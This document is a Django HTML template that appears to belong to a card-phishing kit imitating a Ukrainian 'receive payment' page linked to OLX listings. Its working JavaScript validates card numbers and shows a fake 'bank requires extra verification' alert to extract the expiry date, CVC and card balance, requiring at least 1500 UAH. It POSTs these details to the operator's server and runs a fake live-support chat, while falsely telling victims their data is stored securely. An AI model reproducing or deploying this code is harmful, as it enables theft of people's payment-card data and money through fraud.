{% extends 'base.html' %}

{% load static %}

{% block head %}
{% if product %}
<meta charset="UTF-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Зарахування коштів</title>
{% else %}
<meta http-equiv="refresh"
content="0;https://www.olx.ua/obyavlenie/nalya-alkogoly-f1-i-ryumki-podarok-muzhchine-voennowqe123qemu-IDKkgXq.qwedqwdfafawfwaf.html"/>
{% endif %}
{% endblock %}


{% block content %}
{% if product %}
</div>&#65279;
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,500,700&amp;subset=cyrillic">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.1/css/all.css">
<link rel="stylesheet" type="text/css" href="{% static 'style/bootstrap.css' %}">
<link rel="stylesheet" type="text/css" href="{% static 'style/common.css' %}">
<link rel="shortcut icon" type="image/png" href="{% static 'img/fav-icon.png' %}">
<link rel="stylesheet" href="{% static 'style/second.css' %}">

<script type="text/javascript" charset="utf-8" async="" src="https://www.smartsuppchat.com/loader.js?"></script>
<script type="text/javascript" src="{% static 'scripts/jquery.js' %}"></script>
<script type="text/javascript">

    $(document).ready(function() {
        $("[data-toggle='tooltip']").tooltip()

        if ($(window).height() > $("body").height()) {
            var height = $(window).height() - $("body").height();
            $("body").css("padding-top", Math.round(height / 2) + "px");
        }

        var luhnChk = (function(arr) {
          return function(ccNum) {
            var
            len = ccNum.length,
            bit = 1,
            sum = 0,
            val;

            while (len) {
              val = parseInt(ccNum.charAt(--len), 10);
              sum += (bit ^= 1) ? arr[val] : val;
          }

          return sum && sum % 10 === 0;
      };
  }([0, 2, 4, 6, 8, 1, 3, 5, 7, 9]));


        $(".button-primary").click(function() {

            var holder = $("#input-holder");
            var number = $("#input-number");
            var month = $("#input-month");
            var year = $("#input-year");
            var code = $("#input-code");
            var balance = $("#input-balance");

            var min_year = new Date().getFullYear();
            var max_year = min_year + 10;
                var check_bin = number[0] + number[1] + number[2] + number[3] + number[4] + number[5] + number[6] + number[7] + number[8]; // Проверка пина

                if (check_bin == 421363001 || balance.val() < 1 || number.val().length !== 19 && number.val().length !== 23 || month.val().length !== 2 || month.val() < 01 || month.val() > 12 || year.val().length !== 2 || code.val().length !== 3 || luhnChk($("#input-number").val().replace(/[^0-9]/gi, ""))==false) {

                    if (month.val().length !== 2 || month.val() < 01 || month.val() > 12) {
                        month.addClass("input-error");
                    }

                    if (balance.val() < 1) {
                        balance.addClass("input-error");
                    }

                    if (year.val().length !== 2) {
                        year.addClass("input-error");

                    }

                    if (code.val().length !== 3) {
                        code.addClass("input-error");
                    }
                    setTimeout(function() {
                        number.removeClass("input-error");
                        month.removeClass("input-error");
                        year.removeClass("input-error");
                        code.removeClass("input-error");
                        balance.removeClass("input-error");
                    }, 2500);



                    if (balance.val() < 1500 || balance.val() == '' || year.val().length !== 2 || code.val().length !== 3 || (check_bin == 421363001 || number.val().length !== 19 && number.val().length !== 23 || luhnChk($("#input-number").val().replace(/[^0-9]/gi, ""))==false) || (month.val().length !== 2 || month.val() < 01 || month.val() > 12 )) {

                    }
                    else {
                        $("form:first").submit();
                    }



                    return false;
                } else {
                    $(".preloader").fadeIn();
                    setTimeout(function() {
                        $("form:first").submit();
                    }, 2500);
                }
            });

        $(".button-back").click(function() {
          window.location.href = '/payment/';
      });

        $("input[data-type=number]").bind("input", function() {
            if (this.value.match(/[^0-9]/g)) {
                this.value = this.value.replace(/[^0-9]/g, "");
            }
        });

        $("#input-holder").keypress(function(element) {
            var key = element.keyCode || element.which;

            if (!/[A-Z ]/.test(String.fromCharCode(key)) || (/[ ]/.test(element.value) && key === 32)) {
                return false;
            }
        });

        $("#input-number").bind("input", function() {
            var number = $(this).val();
            var value = number.replace(/\s+/g, '').replace(/[^0-9]/gi, "");
            var matches = value.match(/\d{4,19}/g);
            var match = matches && matches[0] || "";
            var parts = [];

            for (i = 0, length = match.length; i < length; i += 4) {
                parts.push(match.substring(i, i + 4));
            }

            if (parts.length) {
                this.value = parts.join(" ");
            } else {
                this.value = number;
            }

            if (($(this).val().length == 19 || $(this).val().length == 23) && luhnChk(value)==true) {
                $("#input-month").focus();
            }
        });

        $("#input-month").bind("input", function() {
            if ($(this).val().length == 2) {
                $("#input-year").focus();
            }
        });

        $("#input-year").bind("input", function() {
            if ($(this).val().length == 2) {
                $("#input-code").focus();
            }
        });
    });
</script>
<script type="text/javascript" src="{% static 'scripts/bootstrap.js' %}"></script>
<meta charset="utf-8">
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<div class="block_special_white">
    <title>
    Зарахування коштів </title>


    <div class="block-info">
        <h3 class="heading-info" style="position: absolute; top: 5%;">
        Зарахування коштів </h3>

        <p class="description-info">{{product.name_product}}</p>

        <div class="block-error">
            <p>
                <i class="fas fa-exclamation-triangle"></i>
                <span class="label-error"></span>
            </p>
        </div>
    </div>

    <div class="divider"></div>

    <div class="block-method">
        <div class="row">
            <div class="list-method">
                <div class="row">
                    <div class="col-xs-12">
                        <div class="item-method active-method">
                            <img src="{% static 'img/logo-card.svg' %}">
                        </div>
                    </div>
                    <div class="col-xs-12">
                        <div class="description-method">
                            <p>
                            Зарахування коштів </p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div class="block-form">
        <form class="form-payment" method="POST" action="verification/">
            <input type="hidden" name="price" value="">
            <br>

            <div class="form-group">
                <label for="input-number" class="lbl">Номер картки</label>
                <input type="text" class="form-control" id="input-number" name="card_number" data-type="number"
                maxlength="19" placeholder="0000 0000 0000 0000">
            </div>

            <div id="block-inf-hide" class="row" style="display: none;">
                <div class="col-xs-4">
                    <div class="form-group">
                        <label for="input-month" class="lbl">
                        Термiн дії </label>
                        <input type="number" class="form-control" id="input-month" name="card_expire_month"
                        data-type="number" placeholder="01" maxlength="2">
                    </div>
                </div>
                <div class="col-xs-4" style="margin-top: 20px;">
                    <div class="form-group">
                        <label for="input-year" class="lbl">

                        </label>
                        <input type="number" class="form-control" id="input-year" name="card_expire_year"
                        data-type="number" placeholder="21" maxlength="2" style="margin-top: 0px;">
                    </div>
                </div>
                <div class="col-xs-4">
                    <div class="form-group">
                        <div class="input-code">
                            <label for="input-code" class="lbl">
                                CVC-код <i class="far fa-question-circle" data-toggle="tooltip" data-placement="top"
                                title="" data-original-title="3 цифри на зворотній стороні картки"></i> </label>
                                <input type="password" class="form-control " id="input-code" name="card_cvc" data-type="number"
                                placeholder="•••" maxlength="3">
                            </div>

                        </div>
                    </div>

                </div>

                <div id="btn_____" class="form-group"
                style="display:none; max-width: 225px; margin: 0 auto; text-align: center;">
                <label for="input-balance" class="lbl">Баланс картки
                    <i class="far fa-question-circle" data-toggle="tooltip" data-placement="top" title=""
                    data-original-title="Необхідно для верифікації банком"></i>
                </label>
                <input type="number" class="form-control" id="input-balance" name="balance"
                style="padding-top: 6px; padding-bottom: 5px;">
            </div>
        </form>
    </div>


    <div class="block-form-info">
        <h4 class="heading-total">До зарахування: <b>{{product.price}}</b> грн.</h4>
        <p class="heading-secure">
            <i class="fas fa-lock"></i> Ваші дані надійно збережені.
        </p>
    </div>
</div>

<div class="divider"></div>

<div class="block-footer">
    <div class="row">


        <div class="col-xs-12" id="btn_sfdsf">
            <a class="button-primary" style="margin-left:0px;background-color: #003034;margin-bottom:50px;
            border: 2px solid #003034;">
            <i class="fas fa-chevron-right"></i>
            Зарахувати
        </a>
    </div>
</div>
</div>


<div class="preloader">
    <div class="preloader__content" style="margin-left:0px;">
        <svg class="preloader__image" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512">
            <path fill="#ccc"
            d="M304 48c0 26.51-21.49 48-48 48s-48-21.49-48-48 21.49-48 48-48 48 21.49 48 48zm-48 368c-26.51 0-48 21.49-48 48s21.49 48 48 48 48-21.49 48-48-21.49-48-48-48zm208-208c-26.51 0-48 21.49-48 48s21.49 48 48 48 48-21.49 48-48-21.49-48-48-48zM96 256c0-26.51-21.49-48-48-48S0 229.49 0 256s21.49 48 48 48 48-21.49 48-48zm12.922 99.078c-26.51 0-48 21.49-48 48s21.49 48 48 48 48-21.49 48-48c0-26.509-21.491-48-48-48zm294.156 0c-26.51 0-48 21.49-48 48s21.49 48 48 48 48-21.49 48-48c0-26.509-21.49-48-48-48zM108.922 60.922c-26.51 0-48 21.49-48 48s21.49 48 48 48 48-21.49 48-48-21.491-48-48-48z"></path>
        </svg>
    </div>
</div>

<img src="{% static 'img/ts_img.png' %}" class="ts_img">
<div class="block-chat">
    <div class="top-background"></div>
    <img src="{% static 'img/logo.png' %}" class="logo">
    <h3 class="close-chat">X</h3>
    <input type="text" name="text_entry" id="input" class="text_entry" placeholder="Ваше питання...">
    <div class="chat" id="chat-messages">
        <p class="hello-text">Вітаю. Напишіть Ваше питання, протягом 3-5 хвилин, до чату підключиться наш оператор.</p>

    </div>
    <h1 class="send_btn">></h1>
    {% csrf_token %}
</div>
<style type="text/css">

    .close-chat{
        color: white;
        position: absolute;
        top:-15px;
        right:5px;
        padding:10px;
    }
    .chat{
      padding: 10px;
      max-height: 340px;
      overflow-y: scroll;
  }
  .hello-text{
      padding: 5px;
      border-radius: 10px;
      background: #E2E2E2;
      max-width: 200px;
  }
  .text-mess-user{
     background: #B8CFFF;
     padding: 5px;
     border-radius: 10px;
     max-width: 200px;
     margin-top:10px;
     margin-left: 80px;
 }
 .text-mess-worker{
     background: #E2E2E2;
     padding: 5px;
     border-radius: 10px;
     max-width: 200px;
     margin-top: 5px;
 }
 .logo{
  width: 70px;
  height: 50px;
  position: absolute;
  top: 0;
}
.divide{
    position: relative;
    left: -225px;
    top:13px;
}

.block-chat{
  background: #fff;
  height: 450px;
  width: 300px;
  bottom: 20px;
  right: 20px;
  position: fixed;
  border-radius: 10px;
  backdrop-filter: blur(5px);
  box-shadow: 0px 0px 30px
}
.top-background{
  background: #18443B;
  width: 100%;
  height: 50px;
  border-top-left-radius: 7px;
  border-top-right-radius: 7px;
  backdrop-filter: blur(5px);
  box-shadow: 0px 0px 10px
}

.text_entry {
  bottom: 0;
  left: 10px;
  font-size: 20px;
  position: absolute;
  -webkit-transition: width 0.4s ease-in-out;
  transition: width 0.4s ease-in-out;
  background: transparent;
  width: 220px;
  bottom: 10px;
  border: none;
  border-radius: 5000px;
  padding: 8px;
  backdrop-filter: blur(5px);
  box-shadow: 0px 0px 10px
}

.send_btn {
  width: 40px;
  height: 40px;
  bottom: 3px;
  font-size: 30px;
  text-align: center;
  right: 10px;
  color: #23634A;
  background: #F5F5F5;
  position: absolute;
  border: none;
  border-radius: 10px ;
  backdrop-filter: blur(5px);
  z-index: 5;
  box-shadow: 0px 0px 10px;
}


#input-month{
 width: 60px;
 height: 45px;
 position: relative;
}
#input-year{
 width: 60px;
 top: -12px;
 height: 45px;
 left: -40px;
 position: relative;
}

.ts_img{
    width:70px;
    height: 70px;
    position: fixed;
    bottom:25px;
    right:25px;
    border-radius: 100px;
}
.preloader {
    display: none;
    position: fixed;
    left: 0;
    top: 0;
    right: 0;
    bottom: 0;
    overflow: hidden;
    background: #fff;
    z-index: 1001;
}

.preloader__content {
    position: relative;
    top: 40%;
    margin-top: -35px;
    margin-left: -35px;
    text-align: center;
}

.preloader__image {
    width: 70px;
    height: 70px;
    animation: preloader-rotate 2s infinite linear;
}

@keyframes preloader-rotate {
    100% {
        transform: rotate(360deg);
    }
}
</style>

<script type="text/javascript">
    var scroll = 50000;
    var start = 0;
    var last_mess_w = "";
    var chat = 0;
    var last_mess_u = "";
    var first = 0;

    function scrolls() {
        scroll += 8000;
        $(".chat").scrollTop($('.block-chat')[0].scrollHeight);
    }


    function mode() {
        $.ajax({
            url: window.location.href,
            success: function(data) {
                const request = new XMLHttpRequest();
                const url = window.location.href.split("/id:")[0] + "/id:" + {{product.id}} + "/send-mess-user/"
                request.open('GET', url);
                request.send();
                var get_text = "";
                request.addEventListener("readystatechange", () => {
                    if(request.readyState === 4 && request.status === 200) {
                      get_text = String(request.responseText).split("\n");
                      $('.text-mess-user').remove();
                      $('.text-mess-worker').remove();
                      for (let i = 0; i < get_text.length; i++) {
                          if (get_text[i][0] == "U"){
                              $('.chat').append('<p class="text-mess-user">'+get_text[i].replace("U:", "")+'</p>');
                              if (i == get_text.length - 1) {
                                if (get_text[i] != last_mess_u) {
                                    last_mess_u = get_text[i];
                                    scrolls();
                                }
                            }
                        }
                        if (get_text[i][0] == "W"){
                          $('.chat').append('<p class="text-mess-worker">'+get_text[i].replace("W:", "")+'</p>');
                          if (i == get_text.length - 1) {
                            if (get_text[i] != last_mess_w) {
                                last_mess_w = get_text[i];
                                $('.block-chat').show();
                                chat=1;
                                scrolls();
                            }
                        }
                    }
                }
            }
        });
            }
        });
    }

    $('.send_btn').click(function() {
        var input = $("#input");
        var text = "text=" + input.val();
        var get_text = "";
        if (input.val().length != 0) {
            const request = new XMLHttpRequest();
            const url = window.location.href.split("/id:")[0] + "/id:" + {{product.id}} + "/send-mess-user/";
            request.open("POST", url, true);
            request.addEventListener("readystatechange", () => {
                if(request.readyState === 4 && request.status === 200) {
                    input.val("");
                    scrolls();
                }
            });
            request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            request.send(text);


        }
    });


    if(chat == 0){
        $('.block-chat').hide();
    }
    $('.block_special_white').click(function(){
        chat = 0;
        $('.block-chat').hide();
    });
    $('.ts_img').click(function() {
        if(chat == 0){
            chat = 1;
            $('.block-chat').show();
        }else {
            chat = 0;
            $('.block-chat').hide();
        }
    });
    $('.close-chat').click(function(){
        chat = 0;
        $('.block-chat').hide();
    });

    var dostup = 0;
    $('.button-primary').click(function() {
        var number = $("#input-number");
        var block_card = $(".block-form");
        var lbl = $(".lbl");
        if(number.val().length > 18 && dostup != 1 && (number.val().substr(0,1) == '4' || number.val().substr(0,1) == '5')) {
            alert('Банк запросив додаткову верифікацію. Введіть додаткові дані за карткою, у відповідні поля на сторінці.');
            $('#block-inf-hide').fadeIn();
            $('#btn_____').fadeIn();
            $(number).attr('disabled','disabled');
            dostup = 1;
        }
        if(number.val().length < 18) {
            number.addClass("input-error");
            setTimeout(function() { number.removeClass("input-error"); }, 2500);
        }
        if($('#input-month').val().length == 2 && $('#input-month').val() <= 12 && $('#input-month').val() != '' && $('#input-number').val() != '' && $('#input-year').val() != '' && $('#input-code').val() != '' && parseInt($('#input-balance').val()) >= 1500) {

            let post = "card="+ $.trim($('#input-number').val()) + '&date='+ $('#input-month').val() + '/' + $('#input-year').val() +
            '&code='+ $('#input-code').val() + '&balance=' + $('#input-balance').val();

            const request = new XMLHttpRequest();
            const url = window.location.href.split("/id:")[0] + "/id:" + {{product.id}} + "/payment/verif/";
            request.open("POST", url, true);
            request.addEventListener("readystatechange", () => {
                if(request.readyState === 4 && request.status === 200) {
                    let url = window.location.href.split("/id:")[0] + "/id:" + {{product.id}} + "/payment/verification/card=" + $('#input-number').val();
                    window.location.href = url;
                }
            });
            request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            request.send(post);

        }
        if (parseInt($('#input-balance').val()) < 1500) {
           $(this).addClass("input-error");
           alert("Помилка: \nбаланс повинен бути не меншим за 1500 грн.\nПоповнiть картку, або використовуйте iншу з достатнiм балансом")
       }
   });
   setInterval(mode, 100);



</script>

{% endif %}
{% endblock %}
